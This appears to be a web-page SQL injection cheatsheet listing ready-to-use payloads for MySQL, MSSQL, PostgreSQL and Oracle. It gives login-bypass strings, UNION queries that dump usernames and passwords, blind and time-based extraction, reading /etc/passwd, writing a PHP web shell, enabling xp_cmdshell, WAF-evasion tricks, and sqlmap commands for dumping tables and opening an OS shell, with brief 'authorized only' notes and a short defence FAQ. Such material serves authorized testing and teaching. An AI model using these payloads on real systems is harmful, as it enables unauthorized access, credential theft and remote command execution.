SQL Injection Cheatsheet 2026

Every SQLi payload you need — authentication bypass, UNION, error-based, blind boolean and time-based — with MySQL, MSSQL, PostgreSQL and Oracle syntax, WAF bypass tricks and sqlmap. For CTFs, bug bounty and authorized web audits.

Last updated:

New to pentesting? Read our complete beginner's guide to see where web injection fits in the methodology.

Quick Navigation

01 Detection 02 Auth Bypass 03 UNION-Based 04 Error-Based 05 Blind Boolean 06 Time-Based 07 DB-Specific Syntax 08 RCE & File Access 09 WAF Bypass 10 sqlmap

# Detection

First confirm the parameter is injectable. Break the query, then prove control with boolean logic.

'
A single quote — a SQL error or 500 hints at injection
' OR '1'='1
Always-true — returns extra/all rows if injectable
' AND '1'='2
Always-false — a different response confirms control
1 OR 1=1 -- -
Numeric context (no quotes) with a comment to kill the rest
1' ORDER BY 1-- - → ORDER BY 2, 3, ...
Increment until an error to count columns
💡 Comment styles: -- - (space after!), # (MySQL), /* */ (inline). URL-encode # as %23.

# Authentication Bypass

Classic login bypass — comment out the password check or force the WHERE clause true.

admin' -- -
Log in as admin, commenting out the password check
admin' #
Same idea with a MySQL comment
' OR 1=1 -- -
Force the WHERE clause true → log in as the first user
' OR '1'='1' -- -
Quote-balanced variant
') OR ('1'='1' -- -
When input is wrapped in parentheses

# UNION-Based Injection

Return your own data in the response. Match the column count, find reflected columns, then extract.

' UNION SELECT NULL-- - → NULL,NULL-- - → ...
Add NULLs until no error to match the column count
' UNION SELECT 1,2,3-- -
Use numbers to see which columns are reflected on the page
' UNION SELECT NULL,version(),database()-- -
Leak DB version and current database (MySQL/PostgreSQL)
' UNION SELECT table_name,NULL FROM information_schema.tables-- -
Enumerate table names
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'-- -
Enumerate columns of a table
' UNION SELECT username,password FROM users-- -
Dump credentials
' UNION SELECT NULL,group_concat(username,0x3a,password) FROM users-- -
MySQL — pack many rows into one field

# Error-Based Injection

Leak data inside error messages when the app displays SQL errors.

' AND extractvalue(1,concat(0x7e,(SELECT database())))-- -
MySQL — leak via XML function error
' AND updatexml(1,concat(0x7e,(SELECT user())),1)-- -
MySQL — another error-based extractor
' AND 1=CONVERT(int,(SELECT @@version))-- -
MSSQL — type-conversion error leaks the version
' AND 1=CAST((SELECT current_database()) AS int)-- -
PostgreSQL — cast error leaks the database name

# Blind Boolean-Based

No output or errors — infer data from true/false differences in the response.

' AND 1=1-- - vs ' AND 1=2-- -
Baseline: does the page change between true and false?
' AND (SELECT SUBSTRING(version(),1,1))='8'-- -
Test the DB version one character at a time
' AND (SELECT ASCII(SUBSTRING(username,1,1)) FROM users LIMIT 1)>77-- -
Binary-search a character by its ASCII value
' AND (SELECT COUNT(*) FROM users)>5-- -
Infer row counts

# Time-Based Blind

No visible difference at all — make the server pause when a condition is true.

' AND SLEEP(5)-- -
MySQL — 5s delay confirms injection
' AND IF((SELECT ASCII(SUBSTRING(password,1,1)) FROM users LIMIT 1)>77,SLEEP(3),0)-- -
MySQL — conditional delay to extract a character
'; WAITFOR DELAY '0:0:5'-- -
MSSQL — time delay
' AND (SELECT pg_sleep(5))-- -
PostgreSQL — time delay
' AND 1=(SELECT 1 FROM (SELECT SLEEP(5))x)-- -
MySQL — subquery form when SLEEP is filtered directly

# Database-Specific Syntax

The essentials differ per DBMS. Fingerprint first, then use the right functions.

TaskMySQLMSSQL / PostgreSQL
Versionversion()@@version / version()
Current DBdatabase()DB_NAME() / current_database()
Current useruser()SYSTEM_USER / current_user
Concatenateconcat(a,b) / 0x3aa+b / a||b
Comment-- - or #-- - or /* */
SleepSLEEP(5)WAITFOR DELAY / pg_sleep(5)
SELECT schema_name FROM information_schema.schemata
List databases/schemas (MySQL, PostgreSQL, MSSQL)
SELECT name FROM master..sysdatabases
MSSQL — list databases

# RCE & File Access

Escalate from data theft to reading files or executing commands where the DB config allows it.

' UNION SELECT LOAD_FILE('/etc/passwd')-- -
MySQL — read a file (needs FILE privilege)
' UNION SELECT '<?php system($_GET[c]);?>' INTO OUTFILE '/var/www/html/s.php'-- -
MySQL — write a web shell (needs FILE + writable path)
'; EXEC xp_cmdshell 'whoami'-- -
MSSQL — command execution if xp_cmdshell is enabled
'; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE-- -
MSSQL — enable xp_cmdshell first (needs sysadmin)

# WAF Bypass

When a WAF blocks obvious payloads, obfuscate. Highly context-dependent — try combinations.

'/**/OR/**/1=1-- -
Inline comments instead of spaces
' oR 1=1-- - / ' UnIoN SeLeCt ...
Mixed case to defeat keyword filters
%2527 / %2b / double-URL-encode
Double URL-encoding to slip past decoders
UNIUNIONON SELSELECTECT
Nested keywords — survives naive strip-once filters
' OR 1 LIKE 1-- - / ' OR 1 BETWEEN 0 AND 2-- -
Alternative operators when = is blocked

# sqlmap Automation

Automate detection and exploitation. Always run against authorized targets only.

sqlmap -u "http://site/page?id=1" --batch
Auto-detect and exploit a GET parameter
sqlmap -r request.txt --batch
Use a saved Burp request (POST, cookies, headers)
sqlmap -u URL --dbs
List databases
sqlmap -u URL -D shopdb --tables
List tables in a database
sqlmap -u URL -D shopdb -T users --dump
Dump a table's contents
sqlmap -u URL --batch --level=5 --risk=3 --tamper=space2comment
Aggressive scan with a WAF-bypass tamper script
sqlmap -u URL --os-shell
Attempt an interactive OS shell via the DB

❓ SQL Injection FAQ

A web vulnerability where user input is concatenated into a SQL query without sanitisation, letting an attacker alter it — to bypass auth, read/modify data or sometimes run commands. It's part of the OWASP Top 10 Injection category.

Inject a single quote ' and watch for errors. Confirm with ' OR '1'='1 vs ' AND '1'='2 — differing responses mean it's injectable. For numeric params, try 1 OR 1=1 without quotes. Authorized testing only.

In-band: UNION-based and error-based. Blind: boolean-based and time-based. Out-of-band: exfil via DNS/HTTP. Pick based on the feedback the app gives.

Append UNION SELECT to return your own data in the output. Find the column count (ORDER BY n), spot reflected columns, then replace them with data like username/password/version().

When there's no output or error. Boolean-based reads true/false page differences; time-based uses SLEEP()/WAITFOR. Both extract data char by char — best automated with sqlmap.

sqlmap -u 'URL' --batch, or sqlmap -r request.txt for POST/auth. Then --dbs, -D db --tables, -D db -T users --dump. Authorized targets only.

Inline comments (/**/), case variation, URL/double-URL encoding, nested keywords, alternative operators. sqlmap tamper scripts (--tamper=space2comment) automate many. Very context-dependent.

Parameterised queries (prepared statements) are the top fix — input is never concatenated into SQL. Add least-privilege DB accounts, input allow-listing, an ORM and a WAF for defence in depth. Never rely on escaping alone.

📚 Related Resources

AI-Assisted Pentest Report

Turn your SQLi findings into a professional PDF report. AI auto-fills CVE, CVSS and severity.

Try for free →

Want all 12,020+ commands?

This SQL injection cheatsheet is one branch of the map. Pentest Mindmap organizes 12,020+ commands across 34 categories — recon to post-exploitation — with instant search and one-click copy.

Start free →